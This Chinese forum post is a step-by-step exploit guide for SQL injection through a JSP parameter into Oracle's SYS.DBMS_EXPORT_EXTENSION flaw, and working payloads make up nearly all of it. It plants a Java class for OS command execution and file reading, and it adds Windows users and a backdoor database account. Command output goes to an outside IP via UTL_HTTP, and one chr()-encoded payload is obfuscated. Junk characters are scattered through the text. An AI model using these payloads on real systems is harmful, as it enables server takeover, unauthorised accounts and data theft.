以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
# x; v' e- N/ w" C% o X- w& w1 w- R: n$ Q2 n1 C& o
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
9 \0 B" h; } C$ r的形式即可。(用" 'a'|| "是为了让语句返回true值) / n3 V+ s0 S2 O2 z/ T( ]( U6 _. q
语句有点长,可能要用post提交。 . o; ?' O: a/ }+ r+ k5 G
以下是各个步骤: , J; z, Y9 L4 \3 H! [1 D
1.创建包 . A8 z8 F9 N4 N6 _; W4 e4 l
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
6 e- o' m& ]" R, K' V$ h/xxx.jsp?id=1 and '1'<>'a'||(
) w9 J ?/ s y5 [8 \( p( xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. U, H+ ~4 A3 }3 _2 G/ ^ ]create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
0 p5 ^$ _4 D5 B {0 {4 I) }7 @7 B9 vnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
% |/ Q1 N3 p9 ~. \+ c$ o}'''';END;'';END;--','SYS',0,'1',0) from dual
8 w2 T# ~9 ]: t* h2 w- t) * f& D; h3 H7 q& L1 J2 U
------------------------
6 b# Q; c, ?0 F如果url有长度限制,可以把readFile()函数块去掉,即:
$ X& ?6 \4 R$ C( H0 k. H$ f3 R& i0 {/xxx.jsp?id=1 and '1'<>'a'||( - U9 Q# }" R1 o0 K. y: ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. J) L' s' ~) wcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(/ w. a3 I% P7 L5 y, o8 y
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
8 j' [4 }# V* F}'''';END;'';END;--','SYS',0,'1',0) from dual / v8 k) c/ c) L. N& m
)
! e* e$ ~: \. v5 P% f% O! y同时把后面步骤 提到的 对readFile()的处理语句去掉。 3 L2 y0 g8 \# z
------------------------------
8 ~0 Q* n; ]( n" l2 {2.赋Java权限 : b7 F* W3 G$ F4 `1 u
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual# s5 V1 b" Z3 |" j- p! V
3.创建函数 ) D7 I; A6 C. ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') B0 T% j% _" m8 n3 R. }/ W
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual# e- u4 K& i7 T- Q2 \9 T$ ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) j B$ c- |( screate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual! h5 m$ `7 @' t9 {5 D
4.赋public执行函数的权限
; f9 z/ o( z( ~6 u# a) J mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
* w9 V, J& E9 t1 F9 Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
2 {9 D" m: G/ ^% k$ w0 @8 R$ d5.测试上面的几步是否成功
4 ]/ y) z: K6 }* e8 O" R$ Q' qand '1'<>'11'||(
8 D& G+ B& y2 y7 Lselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' 7 o6 M$ F: x& ^& Q- C! q6 Q" g
) % J0 m7 w$ c3 h% @
and '1'<>( ! l+ j+ D8 z2 Z( r
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
4 R) K& o" i/ ]4 P$ E) ( W1 |$ j9 j8 v
6.执行命令: ' d+ }9 m: X7 q* i: l
/xxx.jsp?id=1 and '1'<>(
) @! ?. T) I8 P$ k4 U) H7 h. fselect sys.LinxRunCMD('cmd /c net user linx /add') from dual 4 o5 ]1 j1 Z6 r" [1 n
P# [ K6 ?! f1 L% ^)
/ _7 ~" E3 R: v5 X/xxx.jsp?id=1 and '1'<>( & I" H& ~) H* z2 \8 k7 l
select sys.LinxReadFile('c:/boot.ini') from dual& [; n& p; c; g' X5 i1 `- L
' p3 q- x) O7 H; s
)
7 p8 t. ]% j2 d) D- q6 T
1 U2 ? O( e4 V- ~注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ( G/ [% D4 I' _" d: a
如果要查看运行结果可以用 union : 5 _4 I6 j4 R- {. ~" c2 }( ?
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual& X2 W9 i2 g( k
或者UTL_HTTP.request(:
, E: V: U* j1 }: ~/ D' ~7 H$ T' X/xxx.jsp?id=1 and '1'<>(
( R* ~- p1 u- z! g) Y. kSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual4 [( V3 H5 w4 ^0 ], ]) r
)
$ b! \4 {# `- f/xxx.jsp?id=1 and '1'<>(
: ~# A. U0 Z6 v) a* QSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual( z9 o' j: u$ P6 \
) + R9 ~0 u6 d# z
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
* g. x3 ~+ \: X8 d2 l3 B-------------------- + Z! f) U$ Z+ t5 T
6.内部变化 & _6 e" T# K! k
通过以下命令可以查看all_objects表达改变:
9 @, c) K7 q' |4 `select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%' T6 x4 B. k; J7 t" @9 i
7.删除我们创建的函数 8 }4 j" S' l5 z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 s# N" u0 G. R$ `* r
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual & [( S7 t0 Y6 {* h
==================================================== 0 W" ~/ X- \3 w8 x3 ^
全文结束。谨以此文赠与我的朋友。
5 u* s* {" |4 E: {9 ylinx
/ }, r; u F- Y* L( K# N124829445
8 J0 p; H& p* _* G: j) C2008.1.12 " C0 J9 c3 b A
linyujian@bjfu.edu.cn
- n# c. Z( T) S0 R3 Y======================================================================
$ f0 @. }% \3 H, T测试漏洞的另一方法:
7 W0 k0 h# V) f, h) x创建oracle帐号: / g2 A- ]( _5 x7 G$ Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( W: `* s- Q" n# d3 v8 P
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual' r2 c6 j* `' w8 y& v; Z9 T
即: ! N G9 ^( y( a+ ^9 B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),1 [6 z0 J1 n S3 b. S; M. `
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
' A! O" V% C0 Z确定漏洞存在:
2 c/ b( `$ x3 R* L6 W" L, F: R/ g1<>( - U& Z9 F! C/ e4 v3 T; y
select user_id from all_users where username='LINXSQL'
' Z2 |; H4 i1 l3 Z7 g1 ]) 2 L4 E. H4 Z: t) S
给linxsql连接权限: % X* X; D, ?9 |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! N( ]) g. A# ~8 b
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual ( _% N2 Q1 F$ D d9 P6 b
删除帐号: - N, L2 ?" X1 R0 U& {' j2 L( q" X& ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! v4 q0 h- N. s4 |5 U
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual * i9 Z% A9 E9 |; ~; O
======================
, L- ?5 U8 X. z) a以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
& i; w& J! q% w* K1.jsp?id=1 and '1'<>( 9 i6 N9 S) S' C, D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& I& | ~5 @+ o. ?9 M
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
% L: e/ [9 u# Q8 z( X! j) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE) b1 |& \$ e3 Q3 Q( \
)6 O+ j- u& S! M
. S& k- p3 Q5 g" x% ?
5 V+ W0 u7 r0 I0 u4 F
9 @$ H2 A1 V9 M: l& y |
发表于 2012-12-18 12:21:48
收藏
支持
反对